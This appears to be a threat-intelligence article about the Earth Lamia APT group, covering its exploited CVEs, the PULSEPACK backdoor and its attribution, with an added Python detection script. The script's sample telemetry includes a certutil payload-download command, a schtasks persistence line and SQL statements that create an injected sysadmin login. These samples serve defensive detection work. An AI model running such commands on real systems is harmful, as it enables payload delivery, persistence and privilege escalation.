Introduction: A New Cyber Predator Emerges
Since 2023, a stealthy and relentless APT group known as Earth Lamia has quietly escalated its operations, targeting a wide range of industries across Brazil, India, and Southeast Asia. Far from being a conventional cybercriminal group, Earth Lamia has earned its reputation by exploiting web application vulnerabilities, developing custom malware, and tailoring its tools for precision infiltration and prolonged access. Their ever-evolving tactics, particularly through the use of their bespoke backdoor PULSEPACK and modified open-source tools, signal an alarming shift in the way cyberattacks are carried out.
With each wave of attacks, Earth Lamia adapts and refines its techniques—sidestepping traditional defenses and leaving traces that link their operations to other sophisticated China-nexus threat actors. Their trajectory highlights the increasing overlap between state-backed espionage and financially motivated cybercrime, raising serious concerns for governments, academia, IT infrastructure, and corporations alike.
Earth Lamia’s Evolving Arsenal and Global Campaigns
Trend Research has uncovered Earth Lamia as a rising APT actor that utilizes custom-developed tools to infiltrate organizations in Brazil, India, and Southeast Asia. Since 2023, the group has leveraged SQL injection flaws and public-facing vulnerabilities to access networks and exfiltrate sensitive data. Originally fixated on financial institutions, their targets have now expanded to include logistics firms, online retailers, IT companies, government bodies, and educational institutions.
Their toolkit features custom-developed exploits and backdoors like PULSEPACK, along with heavily modified open-source hacking tools such as BypassBoss. They employ tactics like DLL sideloading, dynamic plugin-based command-and-control architectures, and advanced persistence methods. Earth Lamia doesn’t rely solely on brute force or generic malware; their attacks are tailored, surgical, and stealthy.
Notable vulnerabilities exploited by the group include Apache Struts2 (CVE-2017-9805), GitLab RCE flaws (CVE-2021-22205), CyberPanel and Craft CMS exploits, as well as the recent SAP NetWeaver bug (CVE-2025-31324). After initial access, Earth Lamia typically escalates privileges, moves laterally, and establishes covert tunnels to control compromised networks.
Their signature move is the creation of admin accounts like “sysadmin123” directly through SQL injection commands, providing deep access to databases. Tools such as “certutil.exe” and “JuicyPotato” are used for network reconnaissance and privilege escalation. For persistence, Earth Lamia leverages scheduled tasks, web shells, and hijacked legitimate binaries like “AppLaunch.exe.”
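The techniques in this paragraph (shells spawned from a web server, certutil.exe used to fetch or decode a payload, potato-family privilege escalation, scheduled-task persistence, a hijacked AppLaunch.exe, and admin accounts created through SQL injection) each leave a distinctive trace in ordinary telemetry. The script below, an added example rather than code from Trend Micro or from the Earth Lamia toolset, runs simple detection rules over constructed process-creation events (Sysmon Event ID 1 / Security 4688 style fields) and constructed database audit lines; the record layouts, the service-account name `webapp_svc`, and the rule that the genuine AppLaunch.exe lives under the .NET Framework directory are assumptions of this example.

```python
"""Detection heuristics for the post-exploitation behaviour described above.

Added example; not Trend Micro's code or the actor's tooling. All input
records are CONSTRUCTED stand-ins and their field layouts are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent process image path
    image: str     # created process image path
    cmdline: str   # created process command line


# Web-server worker processes that have no business spawning a shell.
WEB_SERVER_IMAGES = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe", "java.exe", "php-cgi.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# certutil switches used to fetch or decode a payload
CERTUTIL_ABUSE_RE = re.compile(r"-(urlcache|decode)\b", re.I)
# scheduled-task creation (persistence mechanism named in the report)
SCHTASKS_CREATE_RE = re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.I)
# potato-family privilege-escalation tools (JuicyPotato, GodPotato, ...)
POTATO_RE = re.compile(r"(juicy|god|sweet|rogue)potato", re.I)
# Assumption: the legitimate AppLaunch.exe lives under the .NET Framework
# directory; a copy anywhere else points at binary hijacking.
DOTNET_FRAMEWORK_DIR_RE = re.compile(r"\\microsoft\.net\\framework(64)?\\", re.I)
# Account-management / command-execution statements that a web application's
# database login should never issue (the report: admin accounts created
# straight through SQL injection).
SQL_ACCOUNT_RE = re.compile(
    r"\b(create\s+login|create\s+user|sp_addsrvrolemember|alter\s+server\s+role|xp_cmdshell)\b", re.I)
AUDIT_LINE_RE = re.compile(r"(\S+)\s+login=(\S+)\s+stmt=(.*)")


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule that matches one process event."""
    findings = []
    parent, image = basename(ev.parent), basename(ev.image)
    if parent in WEB_SERVER_IMAGES and image in SHELLS:
        findings.append("web-shell-spawn")
    if image == "certutil.exe" and CERTUTIL_ABUSE_RE.search(ev.cmdline):
        findings.append("certutil-download-or-decode")
    if SCHTASKS_CREATE_RE.search(ev.cmdline):
        findings.append("scheduled-task-created")
    if POTATO_RE.search(image):
        findings.append("potato-privesc-tool")
    if image == "applaunch.exe" and not DOTNET_FRAMEWORK_DIR_RE.search(ev.image):
        findings.append("applaunch-outside-framework-dir")
    return findings


def scan_process_events(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """(index, findings) for every event that triggers at least one rule."""
    return [(i, f) for i, ev in enumerate(events) if (f := classify(ev))]


def scan_sql_audit(lines: list[str], app_logins: set[str]) -> list[tuple[str, str, str]]:
    """(timestamp, login, statement) for account/exec statements issued by an
    application login, which is how injection through the web tier shows up."""
    hits = []
    for line in lines:
        m = AUDIT_LINE_RE.match(line)
        if not m:
            continue
        ts, login, stmt = m.groups()
        if login.lower() in app_logins and SQL_ACCOUNT_RE.search(stmt):
            hits.append((ts, login, stmt))
    return hits


# --- constructed sample telemetry (not real observations) -------------------
SAMPLE_PROC_EVENTS = [
    ProcEvent(r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -split -f http://example.invalid/u.txt C:\\Users\\Public\\u.txt"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r"schtasks /create /tn Updater /tr C:\Users\Public\a.exe /sc minute"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\JuicyPotato.exe", "JuicyPotato.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Users\Public\AppLaunch.exe", "AppLaunch.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Editor\editor.exe", "editor.exe notes.txt"),
]
SAMPLE_SQL_AUDIT = [
    "2025-05-01T10:00:01Z login=webapp_svc stmt=SELECT id,name FROM products WHERE id=42",
    "2025-05-01T10:00:07Z login=webapp_svc stmt=CREATE LOGIN sysadmin123 WITH PASSWORD='<redacted>'",
    "2025-05-01T10:00:08Z login=webapp_svc stmt=EXEC sp_addsrvrolemember 'sysadmin123', 'sysadmin'",
    "2025-05-01T10:05:00Z login=dba_admin stmt=CREATE LOGIN new_analyst WITH PASSWORD='<redacted>'",
]

if __name__ == "__main__":
    for idx, findings in scan_process_events(SAMPLE_PROC_EVENTS):
        print(f"process event {idx}: {', '.join(findings)}")
    for ts, login, stmt in scan_sql_audit(SAMPLE_SQL_AUDIT, {"webapp_svc"}):
        print(f"sql audit {ts} {login}: {stmt}")
```

The rules are deliberately narrow: the SQL check fires only for logins the application itself uses, so a DBA creating a login from a management console is not flagged, while the same statement arriving under the web application's credentials is exactly the injection-to-admin-account path the report describes.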
A hallmark of their sophistication is PULSEPACK, a modular .NET backdoor using encrypted WebSocket communication and plugin-based functionality. With the ability to dynamically load payloads on demand, PULSEPACK allows Earth Lamia to minimize detection and maximize adaptability.
Attribution research links Earth Lamia to campaigns previously identified as REF0657 and CL-STA-0048, suggesting overlapping activity with other Chinese-affiliated APTs like DragonRank and even possible coordination with ransomware groups. Although no direct ransomware activity has been confirmed, similarities in tactics and shared infrastructure complicate attribution.
What Undercode Says: Analyzing Earth Lamia
Earth Lamia is more than just another APT group. Its ability to adapt, innovate, and shift targets indicates a well-resourced and strategic actor with clear goals. Let’s break down why this campaign stands out:
- Modular Malware Tactics: PULSEPACK’s architecture is a prime example of modern malware engineering—modular, encrypted, and command-responsive. It doesn’t just infect and collect; it learns, loads what it needs, and stays hidden.
- Industry-Specific Targeting: Earth Lamia doesn’t spread its attacks indiscriminately. It focuses on specific industries during each phase—first finance, then logistics, and now IT, government, and academia. This suggests intelligence-led operations, possibly driven by espionage agendas or economic sabotage.
- Sophisticated Lateral Movement: From using tools like “GodPotato” for privilege escalation to deploying web shells and creating stealthy admin accounts, the group mimics the tactics of elite cyber forces. Their footprint is designed to look like internal activity, which delays detection.
- Tool Customization: Earth Lamia modifies existing hacking tools, stripping out identifying strings and adding encryption layers. This helps them evade detection and throws off analysts by blurring the line between open-source and proprietary malware.
- DLL Sideloading with Security Software: Perhaps the most ironic part of their playbook is using binaries from legitimate security vendors to launch their malware. This is a form of digital judo—using the defender’s strength against them.
- Avoidance of Ransomware Tactics: Unlike typical cybercriminals, Earth Lamia avoids ransomware deployments. This hints at long-term strategic goals rather than short-term financial gain.
- China-Nexus Attribution: Although conclusive proof remains elusive, IP tracing, shared infrastructure, and coding patterns point to ties with Chinese espionage groups. The use of infrastructure overlapping with DragonRank and UNC5174 strengthens this assessment.
- Threat Actor Maturity: Earth Lamia’s ability to develop successive versions of their tools, particularly PULSEPACK’s protocol evolution from TCP to WebSocket, shows software development discipline and a DevOps-like cadence—traits often seen in state-sponsored groups.
- Threat to Public-Facing Applications: They prefer to breach through internet-facing apps, targeting platforms like WordPress, GitLab, JetBrains TeamCity, and SAP NetWeaver. This approach widens the attack surface available to them and avoids triggering internal alarms.
- Use of Stealthy Plugins: The use of Base64-encoded, AES-encrypted plugins allows on-demand capability delivery, reducing the malware’s static signature and making detection via signature-based tools nearly impossible.
- Cross-Group Tool Reuse: Earth Lamia appears to borrow and enhance tools from forums and open-source projects. This underscores the blurring line between criminal hackers and nation-state assets, who increasingly share and repurpose each other’s tools.
- Emerging Global Threat: Their expanding geographic footprint and ability to pivot between sectors make Earth Lamia a threat to both government institutions and the private sector worldwide.
- Medium-Confidence Attribution Issues: While many clues point toward a China-nexus origin, Earth Lamia has taken steps to obscure direct attribution. This ambiguity allows plausible deniability, a tactic favored in cyber-espionage.
- Future-Proofing: Their ongoing refinement of malware indicates a long-term investment in cyber operations, not a one-off campaign.
Fact Checker Results ✅
Earth Lamia is confirmed active since 2023, targeting Brazil, India, and Southeast Asia 🌍
They deploy custom-built tools like PULSEPACK and exploit major public vulnerabilities 🔐
Attribution to Chinese APT groups is suggested but remains with medium confidence 🇨🇳
Prediction: The Road Ahead for Earth Lamia
Given their trajectory, Earth Lamia is unlikely to slow down. We expect the group to:
- Expand targeting into the Middle East and Europe, particularly where geopolitical tensions align with China’s interests.
- Incorporate AI-assisted evasion techniques into their toolset, making future attacks even harder to detect.
- Deepen use of stealthy communication protocols like HTTP/3, DNS tunneling, and decentralized C&C frameworks.
- Possibly collaborate with financially motivated cybercriminal groups for access, laundering, or distraction operations.
- Continue exploiting newly disclosed vulnerabilities with zero-day turnaround speed, putting unpatched organizations at greater risk.
To counter this evolving threat, cybersecurity strategies must shift from passive defense to aggressive threat hunting and continuous infrastructure hardening. Earth Lamia isn’t just a cyber threat—it’s a blueprint for future APT behavior.
References:
Reported By: www.trendmicro.com